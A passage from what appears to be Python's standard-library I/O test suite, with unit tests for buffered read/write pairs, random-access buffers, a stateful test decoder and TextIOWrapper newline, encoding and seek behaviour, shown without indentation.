pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
pair.close()
self.assertTrue(pair.closed)
def test_isatty(self):
class SelectableIsAtty(MockRawIO):
def __init__(self, isatty):
MockRawIO.__init__(self)
self._isatty = isatty
def isatty(self):
return self._isatty
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(False))
self.assertFalse(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(False))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
class CBufferedRWPairTest(BufferedRWPairTest):
tp = io.BufferedRWPair
class PyBufferedRWPairTest(BufferedRWPairTest):
tp = pyio.BufferedRWPair
class BufferedRandomTest(BufferedReaderTest, BufferedWriterTest):
read_mode = "rb+"
write_mode = "wb+"
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
BufferedWriterTest.test_constructor(self)
def test_read_and_write(self):
raw = self.MockRawIO((b"asdf", b"ghjk"))
rw = self.tp(raw, 8)
self.assertEqual(b"as", rw.read(2))
rw.write(b"ddd")
rw.write(b"eee")
self.assertFalse(raw._write_stack) # Buffer writes
self.assertEqual(b"ghjk", rw.read())
self.assertEqual(b"dddeee", raw._write_stack[0])
def test_seek_and_tell(self):
raw = self.BytesIO(b"asdfghjkl")
rw = self.tp(raw)
self.assertEqual(b"as", rw.read(2))
self.assertEqual(2, rw.tell())
rw.seek(0, 0)
self.assertEqual(b"asdf", rw.read(4))
rw.write(b"123f")
rw.seek(0, 0)
self.assertEqual(b"asdf123fl", rw.read())
self.assertEqual(9, rw.tell())
rw.seek(-4, 2)
self.assertEqual(5, rw.tell())
rw.seek(2, 1)
self.assertEqual(7, rw.tell())
self.assertEqual(b"fl", rw.read(11))
rw.flush()
self.assertEqual(b"asdf123fl", raw.getvalue())
self.assertRaises(TypeError, rw.seek, 0.0)
def check_flush_and_read(self, read_func):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
self.assertEqual(b"ab", read_func(bufio, 2))
bufio.write(b"12")
self.assertEqual(b"ef", read_func(bufio, 2))
self.assertEqual(6, bufio.tell())
bufio.flush()
self.assertEqual(6, bufio.tell())
self.assertEqual(b"ghi", read_func(bufio))
raw.seek(0, 0)
raw.write(b"XYZ")
# flush() resets the read buffer
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"XYZ", read_func(bufio, 3))
def test_flush_and_read(self):
self.check_flush_and_read(lambda bufio, *args: bufio.read(*args))
def test_flush_and_readinto(self):
def _readinto(bufio, n=-1):
b = bytearray(n if n >= 0 else 9999)
n = bufio.readinto(b)
return bytes(b[:n])
self.check_flush_and_read(_readinto)
def test_flush_and_peek(self):
def _peek(bufio, n=-1):
# This relies on the fact that the buffer can contain the whole
# raw stream, otherwise peek() can return less.
b = bufio.peek(n)
if n != -1:
b = b[:n]
bufio.seek(len(b), 1)
return b
self.check_flush_and_read(_peek)
def test_flush_and_write(self):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
bufio.write(b"123")
bufio.flush()
bufio.write(b"45")
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"12345fghi", raw.getvalue())
self.assertEqual(b"12345fghi", bufio.read())
def test_threads(self):
BufferedReaderTest.test_threads(self)
BufferedWriterTest.test_threads(self)
def test_writes_and_peek(self):
def _peek(bufio):
bufio.peek(1)
self.check_writes(_peek)
def _peek(bufio):
pos = bufio.tell()
bufio.seek(-1, 1)
bufio.peek(1)
bufio.seek(pos, 0)
self.check_writes(_peek)
def test_writes_and_reads(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.read(1)
self.check_writes(_read)
def test_writes_and_read1s(self):
def _read1(bufio):
bufio.seek(-1, 1)
bufio.read1(1)
self.check_writes(_read1)
def test_writes_and_readintos(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.readinto(bytearray(1))
self.check_writes(_read)
def test_write_after_readahead(self):
# Issue #6629: writing after the buffer was filled by readahead should
# first rewind the raw stream.
for overwrite_size in [1, 5]:
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 4)
# Trigger readahead
self.assertEqual(bufio.read(1), b"A")
self.assertEqual(bufio.tell(), 1)
# Overwriting should rewind the raw stream if it needs so
bufio.write(b"B" * overwrite_size)
self.assertEqual(bufio.tell(), overwrite_size + 1)
# If the write size was smaller than the buffer size, flush() and
# check that rewind happens.
bufio.flush()
self.assertEqual(bufio.tell(), overwrite_size + 1)
s = raw.getvalue()
self.assertEqual(s,
b"A" + b"B" * overwrite_size + b"A" * (9 - overwrite_size))
def test_write_rewind_write(self):
# Various combinations of reading / writing / seeking backwards / writing again
def mutate(bufio, pos1, pos2):
assert pos2 >= pos1
# Fill the buffer
bufio.seek(pos1)
bufio.read(pos2 - pos1)
bufio.write(b'\x02')
# This writes earlier than the previous write, but still inside
# the buffer.
bufio.seek(pos1)
bufio.write(b'\x01')
b = b"\x80\x81\x82\x83\x84"
for i in range(0, len(b)):
for j in range(i, len(b)):
raw = self.BytesIO(b)
bufio = self.tp(raw, 100)
mutate(bufio, i, j)
bufio.flush()
expected = bytearray(b)
expected[j] = 2
expected[i] = 1
self.assertEqual(raw.getvalue(), expected,
"failed result for i=%d, j=%d" % (i, j))
def test_truncate_after_read_or_write(self):
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 100)
self.assertEqual(bufio.read(2), b"AA") # the read buffer gets filled
self.assertEqual(bufio.truncate(), 2)
self.assertEqual(bufio.write(b"BB"), 2) # the write buffer increases
self.assertEqual(bufio.truncate(), 4)
def test_misbehaved_io(self):
BufferedReaderTest.test_misbehaved_io(self)
BufferedWriterTest.test_misbehaved_io(self)
def test_interleaved_read_write(self):
# Test for issue #12213
with self.BytesIO(b'abcdefgh') as raw:
with self.tp(raw, 100) as f:
f.write(b"1")
self.assertEqual(f.read(1), b'b')
f.write(b'2')
self.assertEqual(f.read1(1), b'd')
f.write(b'3')
buf = bytearray(1)
f.readinto(buf)
self.assertEqual(buf, b'f')
f.write(b'4')
self.assertEqual(f.peek(1), b'h')
f.flush()
self.assertEqual(raw.getvalue(), b'1b2d3f4h')
with self.BytesIO(b'abc') as raw:
with self.tp(raw, 100) as f:
self.assertEqual(f.read(1), b'a')
f.write(b"2")
self.assertEqual(f.read(1), b'c')
f.flush()
self.assertEqual(raw.getvalue(), b'a2c')
def test_interleaved_readline_write(self):
with self.BytesIO(b'ab\ncdef\ng\n') as raw:
with self.tp(raw) as f:
f.write(b'1')
self.assertEqual(f.readline(), b'b\n')
f.write(b'2')
self.assertEqual(f.readline(), b'def\n')
f.write(b'3')
self.assertEqual(f.readline(), b'\n')
f.flush()
self.assertEqual(raw.getvalue(), b'1b\n2def\n3\n')
# You can't construct a BufferedRandom over a non-seekable stream.
test_unseekable = None
class CBufferedRandomTest(BufferedRandomTest):
tp = io.BufferedRandom
def test_constructor(self):
BufferedRandomTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_garbage_collection(self):
CBufferedReaderTest.test_garbage_collection(self)
CBufferedWriterTest.test_garbage_collection(self)
class PyBufferedRandomTest(BufferedRandomTest):
tp = pyio.BufferedRandom
# To fully exercise seek/tell, the StatefulIncrementalDecoder has these
# properties:
# - A single output character can correspond to many bytes of input.
# - The number of input bytes to complete the character can be
# undetermined until the last input byte is received.
# - The number of input bytes can vary depending on previous input.
# - A single input byte can correspond to many characters of output.
# - The number of output characters can be undetermined until the
# last input byte is received.
# - The number of output characters can vary depending on previous input.
class StatefulIncrementalDecoder(codecs.IncrementalDecoder):
"""
For testing seek/tell behavior with a stateful, buffering decoder.
Input is a sequence of words. Words may be fixed-length (length set
by input) or variable-length (period-terminated). In variable-length
mode, extra periods are ignored. Possible words are:
- 'i' followed by a number sets the input length, I (maximum 99).
When I is set to 0, words are space-terminated.
- 'o' followed by a number sets the output length, O (maximum 99).
- Any other word is converted into a word followed by a period on
the output. The output word consists of the input word truncated
or padded out with hyphens to make its length equal to O. If O
is 0, the word is output verbatim without truncating or padding.
I and O are initially set to 1. When I changes, any buffered input is
re-scanned according to the new I. EOF also terminates the last word.
"""
def __init__(self, errors='strict'):
codecs.IncrementalDecoder.__init__(self, errors)
self.reset()
def __repr__(self):
return '<SID %x>' % id(self)
def reset(self):
self.i = 1
self.o = 1
self.buffer = bytearray()
def getstate(self):
i, o = self.i ^ 1, self.o ^ 1 # so that flags = 0 after reset()
return bytes(self.buffer), i*100 + o
def setstate(self, state):
buffer, io = state
self.buffer = bytearray(buffer)
i, o = divmod(io, 100)
self.i, self.o = i ^ 1, o ^ 1
def decode(self, input, final=False):
output = ''
for b in input:
if self.i == 0: # variable-length, terminated with period
if b == ord('.'):
if self.buffer:
output += self.process_word()
else:
self.buffer.append(b)
else: # fixed-length, terminate after self.i bytes
self.buffer.append(b)
if len(self.buffer) == self.i:
output += self.process_word()
if final and self.buffer: # EOF terminates the last word
output += self.process_word()
return output
def process_word(self):
output = ''
if self.buffer[0] == ord('i'):
self.i = min(99, int(self.buffer[1:] or 0)) # set input length
elif self.buffer[0] == ord('o'):
self.o = min(99, int(self.buffer[1:] or 0)) # set output length
else:
output = self.buffer.decode('ascii')
if len(output) < self.o:
output += '-'*self.o # pad out with hyphens
if self.o:
output = output[:self.o] # truncate to output length
output += '.'
self.buffer = bytearray()
return output
codecEnabled = False
@classmethod
def lookupTestDecoder(cls, name):
if cls.codecEnabled and name == 'test_decoder':
latin1 = codecs.lookup('latin-1')
return codecs.CodecInfo(
name='test_decoder', encode=latin1.encode, decode=None,
incrementalencoder=None,
streamreader=None, streamwriter=None,
incrementaldecoder=cls)
# Register the previous decoder for testing.
# Disabled by default, tests will enable it.
codecs.register(StatefulIncrementalDecoder.lookupTestDecoder)
class StatefulIncrementalDecoderTest(unittest.TestCase):
"""
Make sure the StatefulIncrementalDecoder actually works.
"""
test_cases = [
# I=1, O=1 (fixed-length input == fixed-length output)
(b'abcd', False, 'a.b.c.d.'),
# I=0, O=0 (variable-length input, variable-length output)
(b'oiabcd', True, 'abcd.'),
# I=0, O=0 (should ignore extra periods)
(b'oi...abcd...', True, 'abcd.'),
# I=0, O=6 (variable-length input, fixed-length output)
(b'i.o6.x.xyz.toolongtofit.', False, 'x-----.xyz---.toolon.'),
# I=2, O=6 (fixed-length input < fixed-length output)
(b'i.i2.o6xyz', True, 'xy----.z-----.'),
# I=6, O=3 (fixed-length input > fixed-length output)
(b'i.o3.i6.abcdefghijklmnop', True, 'abc.ghi.mno.'),
# I=0, then 3; O=29, then 15 (with longer output)
(b'i.o29.a.b.cde.o15.abcdefghijabcdefghij.i3.a.b.c.d.ei00k.l.m', True,
'a----------------------------.' +
'b----------------------------.' +
'cde--------------------------.' +
'abcdefghijabcde.' +
'a.b------------.' +
'.c.------------.' +
'd.e------------.' +
'k--------------.' +
'l--------------.' +
'm--------------.')
]
def test_decoder(self):
# Try a few one-shot test cases.
for input, eof, output in self.test_cases:
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(input, eof), output)
# Also test an unfinished decode, followed by forcing EOF.
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(b'oiabcd'), '')
self.assertEqual(d.decode(b'', 1), 'abcd.')
class TextIOWrapperTest(unittest.TestCase):
def setUp(self):
self.testdata = b"AAA\r\nBBB\rCCC\r\nDDD\nEEE\r\n"
self.normalized = b"AAA\nBBB\nCCC\nDDD\nEEE\n".decode("ascii")
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def test_constructor(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
t.__init__(b, encoding="latin1", newline="\r\n")
self.assertEqual(t.encoding, "latin1")
self.assertEqual(t.line_buffering, False)
t.__init__(b, encoding="utf8", line_buffering=True)
self.assertEqual(t.encoding, "utf8")
self.assertEqual(t.line_buffering, True)
self.assertEqual("\xe9\n", t.readline())
self.assertRaises(TypeError, t.__init__, b, newline=42)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
def test_detach(self):
r = self.BytesIO()
b = self.BufferedWriter(r)
t = self.TextIOWrapper(b)
self.assertIs(t.detach(), b)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("howdy")
self.assertFalse(r.getvalue())
t.detach()
self.assertEqual(r.getvalue(), b"howdy")
self.assertRaises(ValueError, t.detach)
def test_repr(self):
raw = self.BytesIO("hello".encode("utf-8"))
b = self.BufferedReader(raw)
t = self.TextIOWrapper(b, encoding="utf-8")
modname = self.TextIOWrapper.__module__
self.assertEqual(repr(t),
"<%s.TextIOWrapper encoding='utf-8'>" % modname)
raw.name = "dummy"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name='dummy' encoding='utf-8'>" % modname)
t.mode = "r"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name='dummy' mode='r' encoding='utf-8'>" % modname)
raw.name = b"dummy"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name=b'dummy' mode='r' encoding='utf-8'>" % modname)
def test_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, newline="\n", line_buffering=True)
t.write("X")
self.assertEqual(r.getvalue(), b"") # No flush happened
t.write("Y\nZ")
self.assertEqual(r.getvalue(), b"XY\nZ") # All got flushed
t.write("A\rB")
self.assertEqual(r.getvalue(), b"XY\nZA\rB")
def test_encoding(self):
# Check the encoding attribute is always set, and valid
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="utf8")
self.assertEqual(t.encoding, "utf8")
t = self.TextIOWrapper(b)
self.assertTrue(t.encoding is not None)
codecs.lookup(t.encoding)
def test_encoding_errors_reading(self):
# (1) default
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.read)
# (2) explicit strict
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.read)
# (3) ignore
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore")
self.assertEqual(t.read(), "abc\n\n")
# (4) replace
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="replace")
self.assertEqual(t.read(), "abc\n\ufffd\n")
def test_encoding_errors_writing(self):
# (1) default
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.write, "\xff")
# (2) explicit strict
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.write, "\xff")
# (3) ignore
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abcdef\n")
# (4) replace
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="replace",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abc?def\n")
def test_newlines(self):
input_lines = [ "unix\n", "windows\r\n", "os9\r", "last\n", "nonl" ]
tests = [
[ None, [ 'unix\n', 'windows\n', 'os9\n', 'last\n', 'nonl' ] ],
[ '', input_lines ],
[ '\n', [ "unix\n", "windows\r\n", "os9\rlast\n", "nonl" ] ],
[ '\r\n', [ "unix\nwindows\r\n", "os9\rlast\nnonl" ] ],
[ '\r', [ "unix\nwindows\r", "\nos9\r", "last\nnonl" ] ],
]
encodings = (
'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
# Try a range of buffer sizes to test the case where \r is the last
# character in TextIOWrapper._pending_line.
for encoding in encodings:
# XXX: str.encode() should return bytes
data = bytes(''.join(input_lines).encode(encoding))
for do_reads in (False, True):
for bufsize in range(1, 10):
for newline, exp_lines in tests:
bufio = self.BufferedReader(self.BytesIO(data), bufsize)
textio = self.TextIOWrapper(bufio, newline=newline,
encoding=encoding)
if do_reads:
got_lines = []
while True:
c2 = textio.read(2)
if c2 == '':
break
self.assertEqual(len(c2), 2)
got_lines.append(c2 + textio.readline())
else:
got_lines = list(textio)
for got_line, exp_line in zip(got_lines, exp_lines):
self.assertEqual(got_line, exp_line)
self.assertEqual(len(got_lines), len(exp_lines))
def test_newlines_input(self):
testdata = b"AAA\nBB\x00B\nCCC\rDDD\rEEE\r\nFFF\r\nGGG"
normalized = testdata.replace(b"\r\n", b"\n").replace(b"\r", b"\n")
for newline, expected in [
(None, normalized.decode("ascii").splitlines(True)),
("", testdata.decode("ascii").splitlines(True)),
("\n", ["AAA\n", "BB\x00B\n", "CCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r\n", ["AAA\nBB\x00B\nCCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r", ["AAA\nBB\x00B\nCCC\r", "DDD\r", "EEE\r", "\nFFF\r", "\nGGG"]),
]:
buf = self.BytesIO(testdata)
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
self.assertEqual(txt.readlines(), expected)
txt.seek(0)
self.assertEqual(txt.read(), "".join(expected))
def test_newlines_output(self):
testdict = {
"": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\n": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\r": b"AAA\rBBB\rCCC\rX\rY\r\rZ",
"\r\n": b"AAA\r\nBBB\r\nCCC\r\nX\rY\r\r\nZ",
}
tests = [(None, testdict[os.linesep])] + sorted(testdict.items())
for newline, expected in tests:
buf = self.BytesIO()
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
txt.write("AAA\nB")
txt.write("BB\nCCC\n")
txt.write("X\rY\r\nZ")
txt.flush()
self.assertEqual(buf.closed, False)
self.assertEqual(buf.getvalue(), expected)
def test_destructor(self):
l = []
base = self.BytesIO
class MyBytesIO(base):
def close(self):
l.append(self.getvalue())
base.close(self)
b = MyBytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
t.write("abc")
del t
support.gc_collect()
self.assertEqual([b"abc"], l)
def test_override_destructor(self):
record = []
class MyTextIO(self.TextIOWrapper):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
b = self.BytesIO()
t = MyTextIO(b, encoding="ascii")
del t
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
def f():
self.TextIOWrapper(rawio).xyzzy
with support.captured_output("stderr") as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
# The destructor *may* have printed an unraisable error, check it
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith("Exception IOError: "), s)
self.assertTrue(s.endswith(" ignored"), s)
# Systematic tests of the text I/O API
def test_basic_io(self):
for chunksize in (1, 2, 3, 4, 5, 15, 16, 17, 31, 32, 33, 63, 64, 65):
for enc in "ascii", "latin1", "utf8" :# , "utf-16-be", "utf-16-le":
f = self.open(support.TESTFN, "w+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.write("abc"), 3)
f.close()
f = self.open(support.TESTFN, "r+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.tell(), 0)
self.assertEqual(f.read(), "abc")
cookie = f.tell()
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(None), "abc")
f.seek(0)
self.assertEqual(f.read(2), "ab")
self.assertEqual(f.read(1), "c")
self.assertEqual(f.read(1), "")
self.assertEqual(f.read(), "")
self.assertEqual(f.tell(), cookie)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.seek(0, 2), cookie)
self.assertEqual(f.write("def"), 3)
self.assertEqual(f.seek(cookie), cookie)
self.assertEqual(f.read(), "def")
if enc.startswith("utf"):
self.multi_line_test(f, enc)
f.close()
def multi_line_test(self, f, enc):
f.seek(0)
f.truncate()
sample = "s\xff\u0fff\uffff"
wlines = []
for size in (0, 1, 2, 3, 4, 5, 30, 31, 32, 33, 62, 63, 64, 65, 1000):
chars = []
for i in range(size):
chars.append(sample[i % len(sample)])
line = "".join(chars) + "\n"
wlines.append((f.tell(), line))
f.write(line)
f.seek(0)
rlines = []
while True:
pos = f.tell()
line = f.readline()
if not line:
break
rlines.append((pos, line))
self.assertEqual(rlines, wlines)
def test_telling(self):
f = self.open(support.TESTFN, "w+", encoding="utf8")
p0 = f.tell()
f.write("\xff\n")
p1 = f.tell()
f.write("\xff\n")
p2 = f.tell()
f.seek(0)
self.assertEqual(f.tell(), p0)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p1)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p2)
f.seek(0)
for line in f:
self.assertEqual(line, "\xff\n")
self.assertRaises(IOError, f.tell)
self.assertEqual(f.tell(), p2)
f.close()
def test_seeking(self):
chunk_size = _default_chunk_size()
prefix_size = chunk_size - 2
u_prefix = "a" * prefix_size
prefix = bytes(u_prefix.encode("utf-8"))
self.assertEqual(len(u_prefix), len(prefix))
u_suffix = "\u8888\n"
suffix = bytes(u_suffix.encode("utf-8"))
line = prefix + suffix
with self.open(support.TESTFN, "wb") as f:
f.write(line*2)
with self.open(support.TESTFN, "r", encoding="utf-8") as f:
s = f.read(prefix_size)
self.assertEqual(s, str(prefix, "ascii"))
self.assertEqual(f.tell(), prefix_size)
self.assertEqual(f.readline(), u_suffix)
def test_seeking_too(self):
# Regression test for a specific bug
data = b'\xe0\xbf\xbf\n'
with self.open(support.TESTFN, "wb") as f:
f.write(data)
with self.open(support.TESTFN, "r", encoding="utf-8") as f:
f._CHUNK_SIZE # Just test that it exists
f._CHUNK_SIZE = 2
f.readline()
f.tell()
def test_seek_and_tell(self):
#Test seek/tell using the StatefulIncrementalDecoder.
# Make test faster by doing smaller seeks
CHUNK_SIZE = 128
def test_seek_and_tell_with_data(data, min_pos=0):
"""Tell/seek to various points within a data stream and ensure
that the decoded data returned by read() is consistent."""
f = self.open(support.TESTFN, 'wb')
f.write(data)
f.close()
f = self.open(support.TESTFN, encoding='test_decoder')
f._CHUNK_SIZE = CHUNK_SIZE
decoded = f.read()
f.close()
for i in range(min_pos, len(decoded) + 1): # seek positions
for j in [1, 5, len(decoded) - i]: # read lengths
f = self.open(support.TESTFN, encoding='test_decoder')
self.assertEqual(f.read(i), decoded[:i])
cookie = f.tell()
self.assertEqual(f.read(j), decoded[i:i + j])
f.seek(cookie)
self.assertEqual(f.read(), decoded[i:])
f.close()
# Enable the test decoder.
StatefulIncrementalDecoder.codecEnabled = 1
# Run the tests.
try:
# Try each test case.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
test_seek_and_tell_with_data(input)
# Position each test case so that it crosses a chunk boundary.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
offset = CHUNK_SIZE - len(input)//2
prefix = b'.'*offset
# Don't bother seeking into the prefix (takes too long).
min_pos = offset*2
test_seek_and_tell_with_data(prefix + input, min_pos)
# Ensure our test decoder won't interfere with subsequent tests.
finally:
StatefulIncrementalDecoder.codecEnabled = 0
def test_encoded_writes(self):
data = "1234567890"
tests = ("utf-16",
"utf-16-le",
"utf-16-be",
"utf-32",
"utf-32-le",
"utf-32-be")
for encoding in tests:
buf = self.BytesIO()
f = self.TextIOWrapper(buf, encoding=encoding)
# Check if the BOM is written only once (see issue1753).
f.write(data)
f.write(data)
f.seek(0)
self.assertEqual(f.read(), data * 2)
f.seek(0)
self.assertEqual(f.read(), data * 2)
self.assertEqual(buf.getvalue(), (data * 2).encode(encoding))
def test_unreadable(self):
class UnReadable(self.BytesIO):
def readable(self):
return False
txt = self.TextIOWrapper(UnReadable())
self.assertRaises(IOError, txt.read)
def test_read_one_by_one(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\r\nBB"))
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, "AA\nBB")
def test_readlines(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\nBB\nCC"))
self.assertEqual(txt.readlines(), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(None), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(5), ["AA\n", "BB\n"])
# read in amounts equal to TextIOWrapper._CHUNK_SIZE which is 128.
def test_read_by_chunk(self):
# make sure "\r\n" straddles 128 char boundary.
txt = self.TextIOWrapper(self.BytesIO(b"A" * 127 + b"\r\nB"))
reads = ""
while True:
c = txt.read(128)
if not c:
break
reads += c
self.assertEqual(reads, "A"*127+"\nB")
def test_issue1395_1(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
# read one char at a time
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_2(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = ""
while True:
c = txt.read(4)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_3(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read(4)
reads += txt.readline()
reads += txt.readline()
reads += txt.readline()
self.assertEqual(reads, self.normalized)
def test_issue1395_4(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read()
self.assertEqual(reads, self.normalized)
def test_issue1395_5(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
pos = txt.tell()
txt.seek(0)
txt.seek(pos)
self.assertEqual(txt.read(4), "BBB\n")
def test_issue2282(self):
buffer = self.BytesIO(self.testdata)
txt = self.TextIOWrapper(buffer, encoding="ascii")
self.assertEqual(buffer.seekable(), txt.seekable())
def test_append_bom(self):
# The BOM is not written again when appending to a non-empty file
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaa'.encode(charset))
with self.open(filename, 'a', encoding=charset) as f:
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_seek_bom(self):
# Same test, but when seeking manually
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'r+', encoding=charset) as f:
f.seek(pos)
f.write('zzz')
f.seek(0)
f.write('bbb')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'bbbzzz'.encode(charset))
def test_errors_property(self):
with self.open(support.TESTFN, "w") as f:
self.assertEqual(f.errors, "strict")
with self.open(support.TESTFN, "w", errors="replace") as f:
self.assertEqual(f.errors, "replace")
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_threads_write(self):
# Issue6750: concurrent writes could duplicate data
event = threading.Event()
with self.open(support.TESTFN, "w", buffering=1) as f:
def run(n):
text = "Thread%03d\n" % n
event.wait()
f.write(text)
threads = [threading.Thread(target=lambda n=x: run(n))
for x in range(20)]
for t in threads:
t.start()
time.sleep(0.02)
event.set()
for t in threads:
t.join()
with self.open(support.TESTFN) as f:
content = f.read()
for n in range(20):
self.assertEqual(content.count("Thread%03d\n" % n), 1)
def test_flush_error_on_close(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
def bad_flush():
raise IOError()
txt.flush = bad_flush
self.assertRaises(IOError, txt.close) # exception not swallowed
def test_multi_close(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt.close()
txt.close()
txt.close()
self.assertRaises(ValueError, txt.flush)
def test_unseekable(self):
txt = self.TextIOWrapper(self.MockUnseekableIO(self.testdata))
self.assertRaises(self.UnsupportedOperation, txt.tell)
self.assertRaises(self.UnsupportedOperation, txt.seek, 0)
def test_readonly_attributes(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
buf = self.BytesIO(self.testdata)
with self.assertRaises(AttributeError):
txt.buffer = buf
def test_rawio(self):
# Issue #12591: TextIOWrapper must work with raw I/O objects, so
# that subprocess.Popen() can have the required unbuffered
# semantics with universal_newlines=True.
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
# Reads
self.assertEqual(txt.read(4), 'abcd')
self.assertEqual(txt.readline(), 'efghi\n')
self.assertEqual(list(txt), ['jkl\n', 'opq\n'])
def test_rawio_write_through(self):
# Issue #12591: with write_through=True, writes don't need a flush
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n',
write_through=True)
txt.write('1')
txt.write('23\n4')
txt.write('5')
self.assertEqual(b''.join(raw._write_stack), b'123\n45')
class CTextIOWrapperTest(TextIOWrapperTest):
def test_initialization(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
